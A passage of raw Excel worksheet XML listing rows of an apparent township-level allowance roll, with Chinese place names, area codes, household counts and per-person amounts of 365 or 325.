        <v>365</v>
      </c>
      <c r="I1306" s="17">
        <f t="shared" si="63"/>
        <v>365</v>
      </c>
      <c r="J1306" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1306" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1307" customHeight="1" spans="1:11">
      <c r="A1307" s="16" t="s">
        <v>3507</v>
      </c>
      <c r="B1307" s="17" t="s">
        <v>3500</v>
      </c>
      <c r="C1307" s="17" t="s">
        <v>3500</v>
      </c>
      <c r="D1307" s="17" t="s">
        <v>3508</v>
      </c>
      <c r="E1307" s="17" t="s">
        <v>2478</v>
      </c>
      <c r="F1307" s="17">
        <v>4113210417</v>
      </c>
      <c r="G1307" s="17">
        <v>1</v>
      </c>
      <c r="H1307" s="18">
        <v>365</v>
      </c>
      <c r="I1307" s="17">
        <f t="shared" si="63"/>
        <v>365</v>
      </c>
      <c r="J1307" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1307" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1308" customHeight="1" spans="1:11">
      <c r="A1308" s="16" t="s">
        <v>3509</v>
      </c>
      <c r="B1308" s="17" t="s">
        <v>3500</v>
      </c>
      <c r="C1308" s="17" t="s">
        <v>3500</v>
      </c>
      <c r="D1308" s="17" t="s">
        <v>1195</v>
      </c>
      <c r="E1308" s="17" t="s">
        <v>3510</v>
      </c>
      <c r="F1308" s="17" t="s">
        <v>3511</v>
      </c>
      <c r="G1308" s="17">
        <v>1</v>
      </c>
      <c r="H1308" s="18">
        <v>365</v>
      </c>
      <c r="I1308" s="17">
        <f t="shared" si="63"/>
        <v>365</v>
      </c>
      <c r="J1308" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1308" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1309" customHeight="1" spans="1:11">
      <c r="A1309" s="16" t="s">
        <v>3512</v>
      </c>
      <c r="B1309" s="17" t="s">
        <v>3500</v>
      </c>
      <c r="C1309" s="17" t="s">
        <v>3500</v>
      </c>
      <c r="D1309" s="17" t="s">
        <v>3513</v>
      </c>
      <c r="E1309" s="17" t="s">
        <v>3514</v>
      </c>
      <c r="F1309" s="17" t="s">
        <v>3515</v>
      </c>
      <c r="G1309" s="17">
        <v>1</v>
      </c>
      <c r="H1309" s="18">
        <v>365</v>
      </c>
      <c r="I1309" s="17">
        <f t="shared" si="63"/>
        <v>365</v>
      </c>
      <c r="J1309" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1309" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1310" customHeight="1" spans="1:11">
      <c r="A1310" s="16" t="s">
        <v>3516</v>
      </c>
      <c r="B1310" s="17" t="s">
        <v>3500</v>
      </c>
      <c r="C1310" s="17" t="s">
        <v>3517</v>
      </c>
      <c r="D1310" s="17" t="s">
        <v>3518</v>
      </c>
      <c r="E1310" s="17" t="s">
        <v>3519</v>
      </c>
      <c r="F1310" s="17">
        <v>4113210417</v>
      </c>
      <c r="G1310" s="17">
        <v>1</v>
      </c>
      <c r="H1310" s="18">
        <v>365</v>
      </c>
      <c r="I1310" s="17">
        <f t="shared" si="63"/>
        <v>365</v>
      </c>
      <c r="J1310" s="29">
        <v>45108</v>
      </c>
      <c r="K1310" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1311" customHeight="1" spans="1:11">
      <c r="A1311" s="16" t="s">
        <v>3520</v>
      </c>
      <c r="B1311" s="17" t="s">
        <v>3500</v>
      </c>
      <c r="C1311" s="17" t="s">
        <v>3500</v>
      </c>
      <c r="D1311" s="17" t="s">
        <v>3521</v>
      </c>
      <c r="E1311" s="17" t="s">
        <v>3506</v>
      </c>
      <c r="F1311" s="17">
        <v>4113210417</v>
      </c>
      <c r="G1311" s="17">
        <v>1</v>
      </c>
      <c r="H1311" s="18">
        <v>365</v>
      </c>
      <c r="I1311" s="17">
        <f t="shared" si="63"/>
        <v>365</v>
      </c>
      <c r="J1311" s="29">
        <v>45108</v>
      </c>
      <c r="K1311" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1312" customHeight="1" spans="1:11">
      <c r="A1312" s="16" t="s">
        <v>3522</v>
      </c>
      <c r="B1312" s="17" t="s">
        <v>3500</v>
      </c>
      <c r="C1312" s="17" t="s">
        <v>3500</v>
      </c>
      <c r="D1312" s="17" t="s">
        <v>3523</v>
      </c>
      <c r="E1312" s="17" t="s">
        <v>3524</v>
      </c>
      <c r="F1312" s="17">
        <v>4113210417</v>
      </c>
      <c r="G1312" s="17">
        <v>1</v>
      </c>
      <c r="H1312" s="18">
        <v>365</v>
      </c>
      <c r="I1312" s="17">
        <f t="shared" si="63"/>
        <v>365</v>
      </c>
      <c r="J1312" s="29">
        <v>45108</v>
      </c>
      <c r="K1312" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1313" customHeight="1" spans="1:11">
      <c r="A1313" s="16" t="s">
        <v>3525</v>
      </c>
      <c r="B1313" s="17" t="s">
        <v>3500</v>
      </c>
      <c r="C1313" s="17" t="s">
        <v>3500</v>
      </c>
      <c r="D1313" s="17" t="s">
        <v>3526</v>
      </c>
      <c r="E1313" s="17" t="s">
        <v>3527</v>
      </c>
      <c r="F1313" s="17">
        <v>4113210417</v>
      </c>
      <c r="G1313" s="17">
        <v>1</v>
      </c>
      <c r="H1313" s="18">
        <v>365</v>
      </c>
      <c r="I1313" s="17">
        <f t="shared" si="63"/>
        <v>365</v>
      </c>
      <c r="J1313" s="29">
        <v>45108</v>
      </c>
      <c r="K1313" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1314" customHeight="1" spans="1:11">
      <c r="A1314" s="16" t="s">
        <v>3528</v>
      </c>
      <c r="B1314" s="17" t="s">
        <v>3500</v>
      </c>
      <c r="C1314" s="17" t="s">
        <v>3500</v>
      </c>
      <c r="D1314" s="17" t="s">
        <v>3529</v>
      </c>
      <c r="E1314" s="17" t="s">
        <v>3530</v>
      </c>
      <c r="F1314" s="17">
        <v>4113210417</v>
      </c>
      <c r="G1314" s="17">
        <v>2</v>
      </c>
      <c r="H1314" s="18">
        <v>325</v>
      </c>
      <c r="I1314" s="17">
        <f t="shared" ref="I1314:I1328" si="64">H1314*G1314</f>
        <v>650</v>
      </c>
      <c r="J1314" s="29">
        <v>45108</v>
      </c>
      <c r="K1314" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1315" customHeight="1" spans="1:11">
      <c r="A1315" s="16" t="s">
        <v>3531</v>
      </c>
      <c r="B1315" s="17" t="str">
        <f>B1314</f>
        <v>小店乡</v>
      </c>
      <c r="C1315" s="17" t="str">
        <f>C1314</f>
        <v>小店乡</v>
      </c>
      <c r="D1315" s="45" t="s">
        <v>3532</v>
      </c>
      <c r="E1315" s="45" t="s">
        <v>3533</v>
      </c>
      <c r="F1315" s="17">
        <f>F1314</f>
        <v>4113210417</v>
      </c>
      <c r="G1315" s="17"/>
      <c r="H1315" s="17"/>
      <c r="I1315" s="17"/>
      <c r="J1315" s="29"/>
      <c r="K1315" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1316" customHeight="1" spans="1:11">
      <c r="A1316" s="16" t="s">
        <v>3534</v>
      </c>
      <c r="B1316" s="17" t="s">
        <v>3500</v>
      </c>
      <c r="C1316" s="17" t="s">
        <v>3500</v>
      </c>
      <c r="D1316" s="17" t="s">
        <v>1213</v>
      </c>
      <c r="E1316" s="17" t="s">
        <v>3535</v>
      </c>
      <c r="F1316" s="17">
        <v>4113210417</v>
      </c>
      <c r="G1316" s="17">
        <v>1</v>
      </c>
      <c r="H1316" s="18">
        <v>365</v>
      </c>
      <c r="I1316" s="17">
        <f t="shared" ref="I1316:I1324" si="65">H1316*G1316</f>
        <v>365</v>
      </c>
      <c r="J1316" s="29">
        <v>45108</v>
      </c>
      <c r="K1316" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1317" customHeight="1" spans="1:11">
      <c r="A1317" s="16" t="s">
        <v>3536</v>
      </c>
      <c r="B1317" s="17" t="s">
        <v>3500</v>
      </c>
      <c r="C1317" s="17" t="s">
        <v>3500</v>
      </c>
      <c r="D1317" s="17" t="s">
        <v>3537</v>
      </c>
      <c r="E1317" s="17" t="s">
        <v>3538</v>
      </c>
      <c r="F1317" s="17">
        <v>4113210417</v>
      </c>
      <c r="G1317" s="17">
        <v>1</v>
      </c>
      <c r="H1317" s="18">
        <v>365</v>
      </c>
      <c r="I1317" s="17">
        <f t="shared" si="65"/>
        <v>365</v>
      </c>
      <c r="J1317" s="29">
        <v>45108</v>
      </c>
      <c r="K1317" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1318" customHeight="1" spans="1:11">
      <c r="A1318" s="16" t="s">
        <v>3539</v>
      </c>
      <c r="B1318" s="17" t="s">
        <v>3500</v>
      </c>
      <c r="C1318" s="17" t="s">
        <v>3500</v>
      </c>
      <c r="D1318" s="17" t="s">
        <v>3540</v>
      </c>
      <c r="E1318" s="17" t="s">
        <v>3541</v>
      </c>
      <c r="F1318" s="17">
        <v>4113210417</v>
      </c>
      <c r="G1318" s="17">
        <v>1</v>
      </c>
      <c r="H1318" s="18">
        <v>365</v>
      </c>
      <c r="I1318" s="17">
        <f t="shared" si="65"/>
        <v>365</v>
      </c>
      <c r="J1318" s="29">
        <v>45108</v>
      </c>
      <c r="K1318" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1319" customHeight="1" spans="1:11">
      <c r="A1319" s="16" t="s">
        <v>3542</v>
      </c>
      <c r="B1319" s="17" t="s">
        <v>3500</v>
      </c>
      <c r="C1319" s="17" t="s">
        <v>3500</v>
      </c>
      <c r="D1319" s="17" t="s">
        <v>3543</v>
      </c>
      <c r="E1319" s="17" t="s">
        <v>3544</v>
      </c>
      <c r="F1319" s="17">
        <v>4113210417</v>
      </c>
      <c r="G1319" s="17">
        <v>1</v>
      </c>
      <c r="H1319" s="18">
        <v>365</v>
      </c>
      <c r="I1319" s="17">
        <f t="shared" si="65"/>
        <v>365</v>
      </c>
      <c r="J1319" s="29">
        <v>45108</v>
      </c>
      <c r="K1319" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1320" customHeight="1" spans="1:11">
      <c r="A1320" s="16" t="s">
        <v>3545</v>
      </c>
      <c r="B1320" s="17" t="s">
        <v>3500</v>
      </c>
      <c r="C1320" s="17" t="s">
        <v>3500</v>
      </c>
      <c r="D1320" s="17" t="s">
        <v>3546</v>
      </c>
      <c r="E1320" s="17" t="s">
        <v>3547</v>
      </c>
      <c r="F1320" s="17" t="s">
        <v>3548</v>
      </c>
      <c r="G1320" s="17">
        <v>1</v>
      </c>
      <c r="H1320" s="18">
        <v>365</v>
      </c>
      <c r="I1320" s="17">
        <f t="shared" si="65"/>
        <v>365</v>
      </c>
      <c r="J1320" s="29">
        <v>45108</v>
      </c>
      <c r="K1320" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1321" customHeight="1" spans="1:11">
      <c r="A1321" s="16" t="s">
        <v>3549</v>
      </c>
      <c r="B1321" s="17" t="s">
        <v>3500</v>
      </c>
      <c r="C1321" s="17" t="s">
        <v>3500</v>
      </c>
      <c r="D1321" s="17" t="s">
        <v>3550</v>
      </c>
      <c r="E1321" s="17" t="s">
        <v>3551</v>
      </c>
      <c r="F1321" s="17">
        <v>4113210417</v>
      </c>
      <c r="G1321" s="17">
        <v>1</v>
      </c>
      <c r="H1321" s="18">
        <v>365</v>
      </c>
      <c r="I1321" s="17">
        <f t="shared" si="65"/>
        <v>365</v>
      </c>
      <c r="J1321" s="29">
        <v>45108</v>
      </c>
      <c r="K1321" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1322" customHeight="1" spans="1:11">
      <c r="A1322" s="16" t="s">
        <v>3552</v>
      </c>
      <c r="B1322" s="17" t="s">
        <v>3500</v>
      </c>
      <c r="C1322" s="17" t="s">
        <v>3500</v>
      </c>
      <c r="D1322" s="17" t="s">
        <v>3553</v>
      </c>
      <c r="E1322" s="17" t="s">
        <v>3554</v>
      </c>
      <c r="F1322" s="17" t="s">
        <v>3555</v>
      </c>
      <c r="G1322" s="17">
        <v>1</v>
      </c>
      <c r="H1322" s="18">
        <v>365</v>
      </c>
      <c r="I1322" s="17">
        <f t="shared" si="65"/>
        <v>365</v>
      </c>
      <c r="J1322" s="29">
        <v>45108</v>
      </c>
      <c r="K1322" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1323" customHeight="1" spans="1:11">
      <c r="A1323" s="16" t="s">
        <v>3556</v>
      </c>
      <c r="B1323" s="17" t="s">
        <v>3500</v>
      </c>
      <c r="C1323" s="17" t="s">
        <v>3500</v>
      </c>
      <c r="D1323" s="17" t="s">
        <v>3557</v>
      </c>
      <c r="E1323" s="17" t="s">
        <v>3558</v>
      </c>
      <c r="F1323" s="17">
        <v>4113210417</v>
      </c>
      <c r="G1323" s="17">
        <v>1</v>
      </c>
      <c r="H1323" s="18">
        <v>365</v>
      </c>
      <c r="I1323" s="17">
        <f t="shared" si="65"/>
        <v>365</v>
      </c>
      <c r="J1323" s="29">
        <v>45108</v>
      </c>
      <c r="K1323" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1324" customHeight="1" spans="1:11">
      <c r="A1324" s="16" t="s">
        <v>3559</v>
      </c>
      <c r="B1324" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1324" s="17" t="s">
        <v>3561</v>
      </c>
      <c r="D1324" s="17" t="s">
        <v>3562</v>
      </c>
      <c r="E1324" s="17" t="s">
        <v>3563</v>
      </c>
      <c r="F1324" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1324" s="17">
        <v>3</v>
      </c>
      <c r="H1324" s="18">
        <v>335</v>
      </c>
      <c r="I1324" s="17">
        <f t="shared" si="65"/>
        <v>1005</v>
      </c>
      <c r="J1324" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1324" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1325" customHeight="1" spans="1:11">
      <c r="A1325" s="16" t="s">
        <v>3565</v>
      </c>
      <c r="B1325" s="17" t="str">
        <f>B1324</f>
        <v>云阳镇</v>
      </c>
      <c r="C1325" s="17" t="str">
        <f>C1324</f>
        <v>小关九组</v>
      </c>
      <c r="D1325" s="16" t="s">
        <v>3566</v>
      </c>
      <c r="E1325" s="25" t="s">
        <v>3567</v>
      </c>
      <c r="F1325" s="17" t="str">
        <f>F1324</f>
        <v>4113210521</v>
      </c>
      <c r="G1325" s="17"/>
      <c r="H1325" s="17"/>
      <c r="I1325" s="17"/>
      <c r="J1325" s="17"/>
      <c r="K1325" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1326" customHeight="1" spans="1:11">
      <c r="A1326" s="16" t="s">
        <v>3568</v>
      </c>
      <c r="B1326" s="17" t="str">
        <f>B1325</f>
        <v>云阳镇</v>
      </c>
      <c r="C1326" s="17" t="str">
        <f>C1325</f>
        <v>小关九组</v>
      </c>
      <c r="D1326" s="16" t="s">
        <v>3569</v>
      </c>
      <c r="E1326" s="16" t="s">
        <v>3570</v>
      </c>
      <c r="F1326" s="17" t="str">
        <f>F1325</f>
        <v>4113210521</v>
      </c>
      <c r="G1326" s="17"/>
      <c r="H1326" s="17"/>
      <c r="I1326" s="17"/>
      <c r="J1326" s="17"/>
      <c r="K1326" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1327" customHeight="1" spans="1:11">
      <c r="A1327" s="16" t="s">
        <v>3571</v>
      </c>
      <c r="B1327" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1327" s="17" t="s">
        <v>3572</v>
      </c>
      <c r="D1327" s="17" t="s">
        <v>3573</v>
      </c>
      <c r="E1327" s="17" t="s">
        <v>3574</v>
      </c>
      <c r="F1327" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1327" s="17">
        <v>1</v>
      </c>
      <c r="H1327" s="18">
        <v>365</v>
      </c>
      <c r="I1327" s="17">
        <f>H1327*G1327</f>
        <v>365</v>
      </c>
      <c r="J1327" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1327" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1328" customHeight="1" spans="1:11">
      <c r="A1328" s="16" t="s">
        <v>3575</v>
      </c>
      <c r="B1328" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1328" s="17" t="s">
        <v>3572</v>
      </c>
      <c r="D1328" s="17" t="s">
        <v>3576</v>
      </c>
      <c r="E1328" s="17" t="s">
        <v>1320</v>
      </c>
      <c r="F1328" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1328" s="17">
        <v>2</v>
      </c>
      <c r="H1328" s="18">
        <v>325</v>
      </c>
      <c r="I1328" s="17">
        <f>H1328*G1328</f>
        <v>650</v>
      </c>
      <c r="J1328" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1328" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1329" customHeight="1" spans="1:11">
      <c r="A1329" s="16" t="s">
        <v>3577</v>
      </c>
      <c r="B1329" s="17" t="str">
        <f>B1328</f>
        <v>云阳镇</v>
      </c>
      <c r="C1329" s="17" t="str">
        <f>C1328</f>
        <v>小关四组</v>
      </c>
      <c r="D1329" s="16" t="s">
        <v>3578</v>
      </c>
      <c r="E1329" s="16" t="s">
        <v>3579</v>
      </c>
      <c r="F1329" s="17" t="str">
        <f>F1328</f>
        <v>4113210521</v>
      </c>
      <c r="G1329" s="17"/>
      <c r="H1329" s="17"/>
      <c r="I1329" s="17"/>
      <c r="J1329" s="17"/>
      <c r="K1329" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1330" customHeight="1" spans="1:11">
      <c r="A1330" s="16" t="s">
        <v>3580</v>
      </c>
      <c r="B1330" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1330" s="17" t="s">
        <v>3581</v>
      </c>
      <c r="D1330" s="17" t="s">
        <v>3582</v>
      </c>
      <c r="E1330" s="17" t="s">
        <v>3583</v>
      </c>
      <c r="F1330" s="17" t="s">
        <v>3584</v>
      </c>
      <c r="G1330" s="17">
        <v>1</v>
      </c>
      <c r="H1330" s="18">
        <v>365</v>
      </c>
      <c r="I1330" s="17">
        <f t="shared" ref="I1330:I1335" si="66">H1330*G1330</f>
        <v>365</v>
      </c>
      <c r="J1330" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1330" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1331" customHeight="1" spans="1:11">
      <c r="A1331" s="16" t="s">
        <v>3585</v>
      </c>
      <c r="B1331" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1331" s="17" t="s">
        <v>3586</v>
      </c>
      <c r="D1331" s="17" t="s">
        <v>3587</v>
      </c>
      <c r="E1331" s="17" t="s">
        <v>3588</v>
      </c>
      <c r="F1331" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1331" s="17">
        <v>1</v>
      </c>
      <c r="H1331" s="18">
        <v>365</v>
      </c>
      <c r="I1331" s="17">
        <f t="shared" si="66"/>
        <v>365</v>
      </c>
      <c r="J1331" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1331" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1332" customHeight="1" spans="1:11">
      <c r="A1332" s="16" t="s">
        <v>3589</v>
      </c>
      <c r="B1332" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1332" s="17" t="s">
        <v>3590</v>
      </c>
      <c r="D1332" s="17" t="s">
        <v>3591</v>
      </c>
      <c r="E1332" s="17" t="s">
        <v>3592</v>
      </c>
      <c r="F1332" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1332" s="17">
        <v>1</v>
      </c>
      <c r="H1332" s="18">
        <v>365</v>
      </c>
      <c r="I1332" s="17">
        <f t="shared" si="66"/>
        <v>365</v>
      </c>
      <c r="J1332" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1332" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1333" customHeight="1" spans="1:11">
      <c r="A1333" s="16" t="s">
        <v>3594</v>
      </c>
      <c r="B1333" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1333" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1333" s="17" t="s">
        <v>3596</v>
      </c>
      <c r="E1333" s="17" t="s">
        <v>3597</v>
      </c>
      <c r="F1333" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1333" s="17">
        <v>1</v>
      </c>
      <c r="H1333" s="18">
        <v>365</v>
      </c>
      <c r="I1333" s="17">
        <f t="shared" si="66"/>
        <v>365</v>
      </c>
      <c r="J1333" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1333" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1334" customHeight="1" spans="1:11">
      <c r="A1334" s="16" t="s">
        <v>3599</v>
      </c>
      <c r="B1334" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1334" s="17" t="s">
        <v>3590</v>
      </c>
      <c r="D1334" s="17" t="s">
        <v>3600</v>
      </c>
      <c r="E1334" s="17" t="s">
        <v>3601</v>
      </c>
      <c r="F1334" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1334" s="17">
        <v>1</v>
      </c>
      <c r="H1334" s="18">
        <v>365</v>
      </c>
      <c r="I1334" s="17">
        <f t="shared" si="66"/>
        <v>365</v>
      </c>
      <c r="J1334" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1334" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1335" customHeight="1" spans="1:11">
      <c r="A1335" s="16" t="s">
        <v>3602</v>
      </c>
      <c r="B1335" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1335" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1335" s="17" t="s">
        <v>3603</v>
      </c>
      <c r="E1335" s="17" t="s">
        <v>3604</v>
      </c>
      <c r="F1335" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1335" s="17">
        <v>2</v>
      </c>
      <c r="H1335" s="18">
        <v>325</v>
      </c>
      <c r="I1335" s="17">
        <f t="shared" si="66"/>
        <v>650</v>
      </c>
      <c r="J1335" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1335" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1336" customHeight="1" spans="1:11">
      <c r="A1336" s="16" t="s">
        <v>3605</v>
      </c>
      <c r="B1336" s="17" t="str">
        <f>B1335</f>
        <v>云阳镇</v>
      </c>
      <c r="C1336" s="17" t="str">
        <f>C1335</f>
        <v>南召店袁庄</v>
      </c>
      <c r="D1336" s="16" t="s">
        <v>3606</v>
      </c>
      <c r="E1336" s="16" t="s">
        <v>3607</v>
      </c>
      <c r="F1336" s="17" t="str">
        <f>F1335</f>
        <v>4113210519</v>
      </c>
      <c r="G1336" s="17"/>
      <c r="H1336" s="17"/>
      <c r="I1336" s="17"/>
      <c r="J1336" s="17"/>
      <c r="K1336" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1337" customHeight="1" spans="1:11">
      <c r="A1337" s="16" t="s">
        <v>3608</v>
      </c>
      <c r="B1337" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1337" s="17" t="s">
        <v>3609</v>
      </c>
      <c r="D1337" s="17" t="s">
        <v>3610</v>
      </c>
      <c r="E1337" s="17" t="s">
        <v>3597</v>
      </c>
      <c r="F1337" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1337" s="17">
        <v>1</v>
      </c>
      <c r="H1337" s="18">
        <v>365</v>
      </c>
      <c r="I1337" s="17">
        <f t="shared" ref="I1337:I1342" si="67">H1337*G1337</f>
        <v>365</v>
      </c>
      <c r="J1337" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1337" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1338" customHeight="1" spans="1:11">
      <c r="A1338" s="16" t="s">
        <v>3611</v>
      </c>
      <c r="B1338" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1338" s="17" t="s">
        <v>3612</v>
      </c>
      <c r="D1338" s="17" t="s">
        <v>3613</v>
      </c>
      <c r="E1338" s="17" t="s">
        <v>3614</v>
      </c>
      <c r="F1338" s="17" t="s">
        <v>3593</v>
      </c>
      <c r="G1338" s="17">
        <v>1</v>
      </c>
      <c r="H1338" s="18">
        <v>365</v>
      </c>
      <c r="I1338" s="17">
        <f t="shared" si="67"/>
        <v>365</v>
      </c>
      <c r="J1338" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1338" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1339" customHeight="1" spans="1:11">
      <c r="A1339" s="16" t="s">
        <v>3615</v>
      </c>
      <c r="B1339" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1339" s="17" t="s">
        <v>3616</v>
      </c>
      <c r="D1339" s="17" t="s">
        <v>3617</v>
      </c>
      <c r="E1339" s="17" t="s">
        <v>3618</v>
      </c>
      <c r="F1339" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1339" s="17">
        <v>1</v>
      </c>
      <c r="H1339" s="18">
        <v>365</v>
      </c>
      <c r="I1339" s="17">
        <f t="shared" si="67"/>
        <v>365</v>
      </c>
      <c r="J1339" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1339" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1340" customHeight="1" spans="1:11">
      <c r="A1340" s="16" t="s">
        <v>3619</v>
      </c>
      <c r="B1340" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1340" s="17" t="s">
        <v>3616</v>
      </c>
      <c r="D1340" s="17" t="s">
        <v>3620</v>
      </c>
      <c r="E1340" s="17" t="s">
        <v>3621</v>
      </c>
      <c r="F1340" s="17" t="s">
        <v>3564</v>
      </c>
      <c r="G1340" s="17">
        <v>1</v>
      </c>
      <c r="H1340" s="18">
        <v>365</v>
      </c>
      <c r="I1340" s="17">
        <f t="shared" si="67"/>
        <v>365</v>
      </c>
      <c r="J1340" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1340" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1341" customHeight="1" spans="1:11">
      <c r="A1341" s="16" t="s">
        <v>3622</v>
      </c>
      <c r="B1341" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1341" s="17" t="s">
        <v>3581</v>
      </c>
      <c r="D1341" s="17" t="s">
        <v>3623</v>
      </c>
      <c r="E1341" s="17" t="s">
        <v>3624</v>
      </c>
      <c r="F1341" s="17" t="s">
        <v>3584</v>
      </c>
      <c r="G1341" s="17">
        <v>1</v>
      </c>
      <c r="H1341" s="18">
        <v>365</v>
      </c>
      <c r="I1341" s="17">
        <f t="shared" si="67"/>
        <v>365</v>
      </c>
      <c r="J1341" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1341" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1342" customHeight="1" spans="1:11">
      <c r="A1342" s="16" t="s">
        <v>3625</v>
      </c>
      <c r="B1342" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1342" s="17" t="s">
        <v>3595</v>
      </c>
      <c r="D1342" s="17" t="s">
        <v>3626</v>
      </c>
      <c r="E1342" s="17" t="s">
        <v>3627</v>
      </c>
      <c r="F1342" s="17" t="s">
        <v>3598</v>
      </c>
      <c r="G1342" s="17">
        <v>2</v>
      </c>
      <c r="H1342" s="18">
        <v>325</v>
      </c>
      <c r="I1342" s="17">
        <f t="shared" si="67"/>
        <v>650</v>
      </c>
      <c r="J1342" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1342" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1343" customHeight="1" spans="1:11">
      <c r="A1343" s="16" t="s">
        <v>3628</v>
      </c>
      <c r="B1343" s="17" t="str">
        <f>B1342</f>
        <v>云阳镇</v>
      </c>
      <c r="C1343" s="17" t="str">
        <f>C1342</f>
        <v>南召店袁庄</v>
      </c>
      <c r="D1343" s="16" t="s">
        <v>3629</v>
      </c>
      <c r="E1343" s="16" t="s">
        <v>2572</v>
      </c>
      <c r="F1343" s="17" t="str">
        <f>F1342</f>
        <v>4113210519</v>
      </c>
      <c r="G1343" s="17"/>
      <c r="H1343" s="17"/>
      <c r="I1343" s="17"/>
      <c r="J1343" s="17"/>
      <c r="K1343" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1344" customHeight="1" spans="1:11">
      <c r="A1344" s="16" t="s">
        <v>3630</v>
      </c>
      <c r="B1344" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1344" s="17" t="s">
        <v>3631</v>
      </c>
      <c r="D1344" s="17" t="s">
        <v>3632</v>
      </c>
      <c r="E1344" s="17" t="s">
        <v>3633</v>
      </c>
      <c r="F1344" s="17" t="s">
        <v>3584</v>
      </c>
      <c r="G1344" s="17">
        <v>1</v>
      </c>
      <c r="H1344" s="18">
        <v>365</v>
      </c>
      <c r="I1344" s="17">
        <f>H1344*G1344</f>
        <v>365</v>
      </c>
      <c r="J1344" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1344" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1345" customHeight="1" spans="1:11">
      <c r="A1345" s="16" t="s">
        <v>3634</v>
      </c>
      <c r="B1345" s="17" t="s">
        <v>3560</v>
      </c>
      <c r="C1345" s="17" t="s">
        <v>3635</v>
      </c>
      <c r="D1345" s="17" t="s">
        <v>3636</v>
      </c>
      <c r="E1345" s="17" t="s">
        <v>3637</v>
      </c>
      <c r="F1345" s="17" t="s">
        <v>3584</v>
      </c>
      <c r="G1345" s="17">
